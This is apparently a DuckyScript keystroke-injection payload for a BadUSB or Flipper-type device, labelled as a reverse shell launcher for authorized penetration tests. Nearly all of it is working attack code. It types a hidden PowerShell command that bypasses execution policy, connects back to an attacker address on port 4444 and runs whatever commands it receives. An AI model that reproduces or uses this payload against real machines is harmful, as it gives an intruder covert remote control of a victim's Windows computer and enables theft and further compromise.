REM ==============================================
REM CYBERFLIPPER — Reverse Shell Launcher
REM PowerShell reverse shell for authorized
REM penetration testing engagements only.
REM ==============================================
REM TARGET: Windows 10/11
REM AUTHOR: @CYBERFLIPPER / FLLC
REM NOTE: Change ATTACKER_IP and PORT before use

DELAY 2000
GUI r
DELAY 500
STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "Start-Process powershell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command \"$ATTACKER_IP = \\\"192.168.1.100\\\"; $PORT = 4444; $client = New-Object System.Net.Sockets.TCPClient($ATTACKER_IP, $PORT); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + \\\"PS \\\" + (pwd).Path + \\\"> \\\"; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()\"' -WindowStyle Hidden"
ENTER
DELAY 3000
